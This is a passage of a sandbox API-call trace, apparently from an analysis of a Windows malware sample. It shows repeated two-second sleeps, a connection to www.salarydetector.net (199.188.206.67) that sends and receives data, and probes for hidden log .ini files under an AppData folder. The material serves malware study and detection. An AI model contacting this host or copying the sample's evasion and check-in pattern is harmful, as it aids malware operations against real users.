(dwMilliseconds=0x7d0) [0192.324] Sleep (dwMilliseconds=0x7d0) [0192.326] Sleep (dwMilliseconds=0x7d0) [0192.327] Sleep (dwMilliseconds=0x7d0) [0192.329] Sleep (dwMilliseconds=0x7d0) [0192.330] Sleep (dwMilliseconds=0x7d0) [0192.332] Sleep (dwMilliseconds=0x7d0) [0192.333] Sleep (dwMilliseconds=0x7d0) [0192.335] Sleep (dwMilliseconds=0x7d0) [0192.336] Sleep (dwMilliseconds=0x7d0) [0192.338] Sleep (dwMilliseconds=0x7d0) [0192.340] Sleep (dwMilliseconds=0x7d0) [0192.341] Sleep (dwMilliseconds=0x7d0) [0192.342] Sleep (dwMilliseconds=0x7d0) [0192.344] Sleep (dwMilliseconds=0x7d0) [0192.345] Sleep (dwMilliseconds=0x7d0) [0192.347] Sleep (dwMilliseconds=0x7d0) [0192.348] Sleep (dwMilliseconds=0x7d0) [0192.350] Sleep (dwMilliseconds=0x7d0) [0192.351] Sleep (dwMilliseconds=0x7d0) [0192.353] Sleep (dwMilliseconds=0x7d0) [0192.354] Sleep (dwMilliseconds=0x7d0) [0192.356] Sleep (dwMilliseconds=0x7d0) [0192.357] Sleep (dwMilliseconds=0x7d0) [0192.359] Sleep (dwMilliseconds=0x7d0) [0192.360] Sleep (dwMilliseconds=0x7d0) [0192.362] Sleep (dwMilliseconds=0x7d0) [0192.363] Sleep (dwMilliseconds=0x7d0) [0192.365] Sleep (dwMilliseconds=0x7d0) [0192.366] Sleep (dwMilliseconds=0x7d0) [0192.369] Sleep (dwMilliseconds=0x7d0) [0192.370] Sleep (dwMilliseconds=0x7d0) [0192.371] Sleep (dwMilliseconds=0x7d0) [0192.373] Sleep (dwMilliseconds=0x7d0) [0192.374] Sleep (dwMilliseconds=0x7d0) [0192.376] Sleep (dwMilliseconds=0x7d0) [0192.377] Sleep (dwMilliseconds=0x7d0) [0192.379] Sleep (dwMilliseconds=0x7d0) [0192.380] Sleep (dwMilliseconds=0x7d0) [0192.382] Sleep (dwMilliseconds=0x7d0) [0192.383] Sleep (dwMilliseconds=0x7d0) [0192.385] Sleep (dwMilliseconds=0x7d0) [0192.386] Sleep (dwMilliseconds=0x7d0) [0192.388] Sleep (dwMilliseconds=0x7d0) [0192.389] Sleep (dwMilliseconds=0x7d0) [0192.391] Sleep (dwMilliseconds=0x7d0) [0192.392] Sleep (dwMilliseconds=0x7d0) [0192.394] Sleep (dwMilliseconds=0x7d0) [0192.396] Sleep (dwMilliseconds=0x7d0) [0192.397] Sleep (dwMilliseconds=0x7d0) [0192.399] Sleep (dwMilliseconds=0x7d0) [0192.400] Sleep (dwMilliseconds=0x7d0) [0192.401] Sleep (dwMilliseconds=0x7d0) [0192.403] Sleep (dwMilliseconds=0x7d0) [0192.404] Sleep (dwMilliseconds=0x7d0) [0192.406] Sleep (dwMilliseconds=0x7d0) [0192.407] Sleep (dwMilliseconds=0x7d0) [0192.409] Sleep (dwMilliseconds=0x7d0) [0192.410] Sleep (dwMilliseconds=0x7d0) [0192.412] Sleep (dwMilliseconds=0x7d0) [0192.414] Sleep (dwMilliseconds=0x7d0) [0192.415] Sleep (dwMilliseconds=0x7d0) [0192.416] Sleep (dwMilliseconds=0x7d0) [0192.418] Sleep (dwMilliseconds=0x7d0) [0192.419] Sleep (dwMilliseconds=0x7d0) [0192.421] Sleep (dwMilliseconds=0x7d0) [0192.422] Sleep (dwMilliseconds=0x7d0) [0192.424] Sleep (dwMilliseconds=0x7d0) [0192.426] Sleep (dwMilliseconds=0x7d0) [0192.427] Sleep (dwMilliseconds=0x7d0) [0192.429] Sleep (dwMilliseconds=0x7d0) [0192.430] Sleep (dwMilliseconds=0x7d0) [0192.431] Sleep (dwMilliseconds=0x7d0) [0192.433] Sleep (dwMilliseconds=0x7d0) [0192.434] Sleep (dwMilliseconds=0x7d0) [0192.436] Sleep (dwMilliseconds=0x7d0) [0192.438] Sleep (dwMilliseconds=0x7d0) [0192.439] Sleep (dwMilliseconds=0x7d0) [0192.441] Sleep (dwMilliseconds=0x7d0) [0192.442] Sleep (dwMilliseconds=0x7d0) [0192.444] Sleep (dwMilliseconds=0x7d0) [0192.445] Sleep (dwMilliseconds=0x7d0) [0192.447] Sleep (dwMilliseconds=0x7d0) [0192.448] Sleep (dwMilliseconds=0x7d0) [0192.449] Sleep (dwMilliseconds=0x7d0) [0192.451] Sleep (dwMilliseconds=0x7d0) [0192.452] Sleep (dwMilliseconds=0x7d0) [0192.454] Sleep (dwMilliseconds=0x7d0) [0192.456] Sleep (dwMilliseconds=0x7d0) [0192.457] Sleep (dwMilliseconds=0x7d0) [0192.483] Sleep (dwMilliseconds=0x7d0) [0192.485] Sleep (dwMilliseconds=0x7d0) [0192.487] Sleep (dwMilliseconds=0x7d0) [0192.488] Sleep (dwMilliseconds=0x7d0) [0192.490] Sleep (dwMilliseconds=0x7d0) [0192.491] Sleep (dwMilliseconds=0x7d0) [0192.493] Sleep (dwMilliseconds=0x7d0) [0192.494] Sleep (dwMilliseconds=0x7d0) [0192.496] Sleep (dwMilliseconds=0x7d0) [0192.497] Sleep (dwMilliseconds=0x7d0) [0192.499] Sleep (dwMilliseconds=0x7d0) [0192.500] Sleep (dwMilliseconds=0x7d0) [0192.502] Sleep (dwMilliseconds=0x7d0) [0192.503] Sleep (dwMilliseconds=0x7d0) [0192.505] Sleep (dwMilliseconds=0x7d0) [0192.506] Sleep (dwMilliseconds=0x7d0) [0192.508] Sleep (dwMilliseconds=0x7d0) [0192.509] Sleep (dwMilliseconds=0x7d0) [0192.511] Sleep (dwMilliseconds=0x7d0) [0192.512] Sleep (dwMilliseconds=0x7d0) [0192.514] Sleep (dwMilliseconds=0x7d0) [0192.515] Sleep (dwMilliseconds=0x7d0) [0192.517] Sleep (dwMilliseconds=0x7d0) [0192.518] Sleep (dwMilliseconds=0x7d0) [0192.520] Sleep (dwMilliseconds=0x7d0) [0192.521] Sleep (dwMilliseconds=0x7d0) [0192.523] Sleep (dwMilliseconds=0x7d0) [0192.524] Sleep (dwMilliseconds=0x7d0) [0192.526] Sleep (dwMilliseconds=0x7d0) [0192.527] Sleep (dwMilliseconds=0x7d0) [0192.529] Sleep (dwMilliseconds=0x7d0) [0192.530] Sleep (dwMilliseconds=0x7d0) [0192.532] Sleep (dwMilliseconds=0x7d0) [0192.533] Sleep (dwMilliseconds=0x7d0) [0192.535] Sleep (dwMilliseconds=0x7d0) [0192.536] Sleep (dwMilliseconds=0x7d0) [0192.538] Sleep (dwMilliseconds=0x7d0) [0192.539] Sleep (dwMilliseconds=0x7d0) [0192.541] Sleep (dwMilliseconds=0x7d0) [0192.542] Sleep (dwMilliseconds=0x7d0) [0192.544] Sleep (dwMilliseconds=0x7d0) [0192.545] Sleep (dwMilliseconds=0x7d0) [0192.547] Sleep (dwMilliseconds=0x7d0) [0192.548] Sleep (dwMilliseconds=0x7d0) [0192.550] Sleep (dwMilliseconds=0x7d0) [0192.551] Sleep (dwMilliseconds=0x7d0) [0192.553] Sleep (dwMilliseconds=0x7d0) [0192.554] Sleep (dwMilliseconds=0x7d0) [0192.556] Sleep (dwMilliseconds=0x7d0) [0192.557] Sleep (dwMilliseconds=0x7d0) [0192.559] Sleep (dwMilliseconds=0x7d0) [0192.560] Sleep (dwMilliseconds=0x7d0) [0192.562] Sleep (dwMilliseconds=0x7d0) [0192.563] Sleep (dwMilliseconds=0x7d0) [0192.565] Sleep (dwMilliseconds=0x7d0) [0192.566] Sleep (dwMilliseconds=0x7d0) [0192.568] Sleep (dwMilliseconds=0x7d0) [0192.569] Sleep (dwMilliseconds=0x7d0) [0192.571] Sleep (dwMilliseconds=0x7d0) [0192.572] Sleep (dwMilliseconds=0x7d0) [0192.574] Sleep (dwMilliseconds=0x7d0) [0192.575] Sleep (dwMilliseconds=0x7d0) [0192.577] Sleep (dwMilliseconds=0x7d0) [0192.578] Sleep (dwMilliseconds=0x7d0) [0192.580] Sleep (dwMilliseconds=0x7d0) [0192.581] Sleep (dwMilliseconds=0x7d0) [0192.583] Sleep (dwMilliseconds=0x7d0) [0192.584] Sleep (dwMilliseconds=0x7d0) [0192.585] Sleep (dwMilliseconds=0x7d0) [0192.587] Sleep (dwMilliseconds=0x7d0) [0192.589] Sleep (dwMilliseconds=0x7d0) [0192.590] Sleep (dwMilliseconds=0x7d0) [0192.592] Sleep (dwMilliseconds=0x7d0) [0192.593] Sleep (dwMilliseconds=0x7d0) [0192.594] Sleep (dwMilliseconds=0x7d0) [0192.596] Sleep (dwMilliseconds=0x7d0) [0192.597] Sleep (dwMilliseconds=0x7d0) [0192.599] Sleep (dwMilliseconds=0x7d0) [0192.601] Sleep (dwMilliseconds=0x7d0) [0192.602] Sleep (dwMilliseconds=0x7d0) [0192.604] Sleep (dwMilliseconds=0x7d0) [0192.605] Sleep (dwMilliseconds=0x7d0) [0192.606] Sleep (dwMilliseconds=0x7d0) [0192.608] Sleep (dwMilliseconds=0x7d0) [0192.610] Sleep (dwMilliseconds=0x7d0) [0192.611] Sleep (dwMilliseconds=0x7d0) [0192.613] Sleep (dwMilliseconds=0x7d0) [0192.614] Sleep (dwMilliseconds=0x7d0) [0192.616] Sleep (dwMilliseconds=0x7d0) [0192.617] Sleep (dwMilliseconds=0x7d0) [0192.619] Sleep (dwMilliseconds=0x7d0) [0192.620] Sleep (dwMilliseconds=0x7d0) [0192.622] Sleep (dwMilliseconds=0x7d0) [0192.623] Sleep (dwMilliseconds=0x7d0) [0192.625] Sleep (dwMilliseconds=0x7d0) [0192.626] Sleep (dwMilliseconds=0x7d0) [0192.628] Sleep (dwMilliseconds=0x7d0) [0192.629] Sleep (dwMilliseconds=0x7d0) [0192.631] Sleep (dwMilliseconds=0x7d0) [0192.632] Sleep (dwMilliseconds=0x7d0) [0192.634] Sleep (dwMilliseconds=0x7d0) [0192.635] Sleep (dwMilliseconds=0x7d0) [0192.637] Sleep (dwMilliseconds=0x7d0) [0192.638] Sleep (dwMilliseconds=0x7d0) [0192.640] Sleep (dwMilliseconds=0x7d0) [0192.641] Sleep (dwMilliseconds=0x7d0) [0192.643] Sleep (dwMilliseconds=0x7d0) [0192.644] Sleep (dwMilliseconds=0x7d0) [0192.645] Sleep (dwMilliseconds=0x7d0) [0192.647] Sleep (dwMilliseconds=0x7d0) [0192.658] Sleep (dwMilliseconds=0x7d0) [0192.659] Sleep (dwMilliseconds=0x7d0) [0192.661] Sleep (dwMilliseconds=0x7d0) [0192.662] Sleep (dwMilliseconds=0x7d0) [0192.664] Sleep (dwMilliseconds=0x7d0) [0192.665] Sleep (dwMilliseconds=0x7d0) [0192.667] Sleep (dwMilliseconds=0x7d0) [0192.668] Sleep (dwMilliseconds=0x7d0) [0192.670] Sleep (dwMilliseconds=0x7d0) [0192.671] Sleep (dwMilliseconds=0x7d0) [0192.673] Sleep (dwMilliseconds=0x7d0) [0192.674] Sleep (dwMilliseconds=0x7d0) [0192.676] Sleep (dwMilliseconds=0x7d0) [0192.677] Sleep (dwMilliseconds=0x7d0) [0192.679] Sleep (dwMilliseconds=0x7d0) [0192.680] Sleep (dwMilliseconds=0x7d0) [0192.700] Sleep (dwMilliseconds=0x7d0) [0192.701] Sleep (dwMilliseconds=0x7d0) [0192.703] Sleep (dwMilliseconds=0x7d0) [0192.704] Sleep (dwMilliseconds=0x7d0) [0192.706] Sleep (dwMilliseconds=0x7d0) [0192.707] Sleep (dwMilliseconds=0x7d0) [0192.709] Sleep (dwMilliseconds=0x7d0) [0192.710] Sleep (dwMilliseconds=0x7d0) [0192.712] Sleep (dwMilliseconds=0x7d0) [0192.713] Sleep (dwMilliseconds=0x7d0) [0192.715] Sleep (dwMilliseconds=0x7d0) [0192.716] Sleep (dwMilliseconds=0x7d0) [0192.718] Sleep (dwMilliseconds=0x7d0) [0192.719] Sleep (dwMilliseconds=0x7d0) [0192.721] Sleep (dwMilliseconds=0x7d0) [0192.722] Sleep (dwMilliseconds=0x7d0) [0192.724] Sleep (dwMilliseconds=0x7d0) [0192.725] Sleep (dwMilliseconds=0x7d0) [0192.727] Sleep (dwMilliseconds=0x7d0) [0192.728] Sleep (dwMilliseconds=0x7d0) [0192.730] Sleep (dwMilliseconds=0x7d0) [0192.731] Sleep (dwMilliseconds=0x7d0) [0192.733] Sleep (dwMilliseconds=0x7d0) [0192.735] Sleep (dwMilliseconds=0x7d0) [0192.736] Sleep (dwMilliseconds=0x7d0) [0192.738] Sleep (dwMilliseconds=0x7d0) [0192.739] Sleep (dwMilliseconds=0x7d0) [0192.741] Sleep (dwMilliseconds=0x7d0) [0192.743] Sleep (dwMilliseconds=0x7d0) [0192.744] Sleep (dwMilliseconds=0x7d0) [0192.745] Sleep (dwMilliseconds=0x7d0) [0192.747] Sleep (dwMilliseconds=0x7d0) [0192.748] Sleep (dwMilliseconds=0x7d0) [0192.750] Sleep (dwMilliseconds=0x7d0) [0192.751] Sleep (dwMilliseconds=0x7d0) [0192.753] Sleep (dwMilliseconds=0x7d0) [0192.754] Sleep (dwMilliseconds=0x7d0) [0192.756] Sleep (dwMilliseconds=0x7d0) [0192.757] Sleep (dwMilliseconds=0x7d0) [0192.759] Sleep (dwMilliseconds=0x7d0) [0192.760] Sleep (dwMilliseconds=0x7d0) [0192.762] Sleep (dwMilliseconds=0x7d0) [0192.763] Sleep (dwMilliseconds=0x7d0) [0192.765] Sleep (dwMilliseconds=0x7d0) [0192.766] Sleep (dwMilliseconds=0x7d0) [0192.768] Sleep (dwMilliseconds=0x7d0) [0192.769] Sleep (dwMilliseconds=0x7d0) [0192.771] Sleep (dwMilliseconds=0x7d0) [0192.772] Sleep (dwMilliseconds=0x7d0) [0192.774] Sleep (dwMilliseconds=0x7d0) [0192.775] Sleep (dwMilliseconds=0x7d0) [0192.777] Sleep (dwMilliseconds=0x7d0) [0192.778] Sleep (dwMilliseconds=0x7d0) [0192.780] Sleep (dwMilliseconds=0x7d0) [0192.781] Sleep (dwMilliseconds=0x7d0) [0192.784] Sleep (dwMilliseconds=0x7d0) [0192.828] Sleep (dwMilliseconds=0x7d0) [0192.830] Sleep (dwMilliseconds=0x7d0) [0192.831] Sleep (dwMilliseconds=0x7d0) [0192.833] Sleep (dwMilliseconds=0x7d0) [0192.834] Sleep (dwMilliseconds=0x7d0) [0192.836] Sleep (dwMilliseconds=0x7d0) [0192.837] Sleep (dwMilliseconds=0x7d0) [0192.839] Sleep (dwMilliseconds=0x7d0) [0192.840] Sleep (dwMilliseconds=0x7d0) [0192.842] Sleep (dwMilliseconds=0x7d0) [0192.843] Sleep (dwMilliseconds=0x7d0) [0192.845] Sleep (dwMilliseconds=0x7d0) [0192.846] Sleep (dwMilliseconds=0x7d0) [0192.848] Sleep (dwMilliseconds=0x7d0) [0192.849] Sleep (dwMilliseconds=0x7d0) [0192.851] Sleep (dwMilliseconds=0x7d0) [0192.853] Sleep (dwMilliseconds=0x7d0) [0192.854] Sleep (dwMilliseconds=0x7d0) [0192.856] Sleep (dwMilliseconds=0x7d0) [0192.857] Sleep (dwMilliseconds=0x7d0) [0192.859] Sleep (dwMilliseconds=0x7d0) [0192.962] Sleep (dwMilliseconds=0x7d0) [0192.963] socket (af=2, type=1, protocol=6) returned 0x268c [0192.964] getaddrinfo (in: pNodeName="www.salarydetector.net", pServiceName="80", pHints=0x87905d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8790608 | out: ppResult=0x8790608*=0x58a6a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884680*(sa_family=2, sin_port=0x50, sin_addr="199.188.206.67"), ai_next=0x0)) returned 0 [0192.989] connect (s=0x268c, name=0x8884680*(sa_family=2, sin_port=0x50, sin_addr="199.188.206.67"), namelen=16) returned 0 [0193.178] send (s=0x268c, buf=0xa10808a*, len=177, flags=0) returned 177 [0193.178] setsockopt (s=0x268c, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0193.178] recv (in: s=0x268c, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 1071 [0193.383] closesocket (s=0x268c) returned 0 [0193.383] Sleep (dwMilliseconds=0x7d0) [0193.385] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.385] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.385] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0193.385] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894dba0) returned 1 [0193.385] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.385] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.385] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0193.386] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d3c0) returned 1 [0193.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.386] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.386] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0193.386] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894dba0) returned 1 [0193.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.386] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.386] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0193.386] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d840) returned 1 [0193.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.386] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.386] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0193.386] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894ce20) returned 1 [0193.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.386] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.387] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0193.387] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894ce20) returned 1 [0193.387] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.387] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.387] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0193.387] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894ce20) returned 1 [0193.387] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.387] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0193.387] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0193.387] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894ce20) returned 1 [0193.387] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.387] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, 